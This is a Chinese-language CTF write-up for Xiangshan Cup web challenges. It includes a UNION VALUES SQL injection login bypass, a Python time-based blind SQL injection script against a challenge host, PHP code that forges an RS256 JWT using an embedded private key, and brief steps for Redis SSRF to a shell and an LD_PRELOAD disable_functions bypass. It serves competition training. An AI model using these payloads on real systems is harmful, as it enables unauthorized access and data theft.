0%

香山杯网络安全攻防大赛-WriteuP

香山杯 WEB

login

测试发现union没有被过滤,测试发现版本位MYSQL8,直接values 生成一个新的值,不过密码注意要是md5加密后的。

username=aadmin' union values row(1,'admin','21232f297a57a5a743894a0e4a801fc3')#&password=admin&login=login

海量视频

时间盲注直接出来密码:

import requests


def ord2hex(string):
    result = ""
    for i in string:
        r = hex(ord(i));
        r = r.replace('0x','')
        result = result+r
    return '0x'+result

tables = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
flag = ""
for i in range(1,50):
    for j in range(36,128):
        data = {
            'username':"admin' and if((ord(mid((select pwd from user where username='admin'),%s,1))=%s),sleep(5),1)#"%(i,j),
            'pwd':'admin',
        }
        try:
            r = requests.post('http://eci-2ze2somogyzyy5tuz8cx.cloudeci1.ichunqiu.com',data=data,timeout=2);
        except Exception as e:
            flag = flag+chr(j)
            print(flag)
            break

F12 发现存在任意文件读取,直接读源码,发现需要JWT伪造,直接下载公钥进行JWT伪造:

<?php 
include('JWT.php');
include('Key.php');
use Firebase\JWT\JWT;
use Firebase\JWT\Key;

$privateKey = <<<EOD
-----BEGIN RSA PRIVATE KEY-----
MIICWwIBAAKBgQCrC+gEPuf8kPP5QXqT74Fp+w/uSk57DeSrc8PnxJ3IjbrklWB9
shUnoNnAs2I8SveYgrMVXcjodqhTjh9xDRTwSdqmi+HUqDyrzkoHRkhs+o5wvIm7
WbkQCp6EqYX5FmJqBlEAUVlNMgBEA+rLB7S4qoWzMlkyJhdQctao972JkQIDAQAB
AoGAalFcRkdTq4nuHGC28H1O07FalaNaZOKd4HR0sPtll+OA59Rxxa+LtrYko8Lc
rN1sST/0ULOazePzfPw6Turyt+TRgtezmOzhbqk+QUQ1fqW9mvcPIoVogEEEALla
5tjnDKsUUBpihsLsDGQYkAZLk/uFGcfBKfPPtHdFl8YrwAECQQDaQQWNpuN3N4Yo
y+nid8WYMdbfRP/S9QdeY1j95kagxz5FXYznpKTdxsX5ulSD+QV7E+6o7T79XEnM
2A3KjHShAkEAyKDSAOeVFbS8M/2/Qn2U6bm0rozEPudkUIC9e/2cA0tMnsICtGXR
uKgAQEEHHMw54KghxCyxeAD06GUSjkz+8QJARGSl0drfYweCQhyMYUx5HhVYKUUd
CcWBFqH5TC8yKMXnDKOhOSHODDVy6qvqOiT6A7SeUE9wMsMN2WRHBhb3oQJAEUQF
zp4fbmbHa5ICy64TCqo4qmzi1qcDMwphRDJnIsFwLplzsiKxEbsjimQOQKQyturB
PSi7fSBX80f/eM+XgQJAP7HhrNgm0NAiMJHVR3QF/2sYOF92xzj/bp3sq1y4mmBE
6Zr6qFiWpYasR8DnBnd19rM0FEDfppYyK9f8Q+OzRg==
-----END RSA PRIVATE KEY-----
EOD;

$publicKey = <<<EOD
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCrC+gEPuf8kPP5QXqT74Fp+w/u
Sk57DeSrc8PnxJ3IjbrklWB9shUnoNnAs2I8SveYgrMVXcjodqhTjh9xDRTwSdqm
i+HUqDyrzkoHRkhs+o5wvIm7WbkQCp6EqYX5FmJqBlEAUVlNMgBEA+rLB7S4qoWz
MlkyJhdQctao972JkQIDAQAB
-----END PUBLIC KEY-----
EOD;

$payload = array(
        "name" => "admin",
        "pwd" => 'jw2fdkci2F2md2FFA4',
        "isadmin" => true,
    );

$jwt = JWT::encode($payload, $privateKey, 'RS256');
echo "Encode:\n" . print_r($jwt, true) . "\n";

$decoded = JWT::decode($jwt, new Key($publicKey, 'RS256'));
$sqlres = "select *  from user where username = '" .$decoded->name . "';";
echo $sqlres;
/*
 NOTE: This will now be an object instead of an associative array. To get
 an associative array, you will need to cast it as such:
*/

$decoded_array = (array) $decoded;
echo "Decode:\n" . print_r($decoded_array, true) . "\n";
  • 用伪造的cookie 直接登录成功:

image-20211107150622726

  • 后台SSRF直接攻击Redis直接getshell

image-20211107150814428

  • getshellh后需要Bypass disable function,发现没有ban error_log,可以直接用LD_PRELOAD来bypass,但是蚁剑的不大行,我们直接自己上传,执行readflag

image-20211107151017211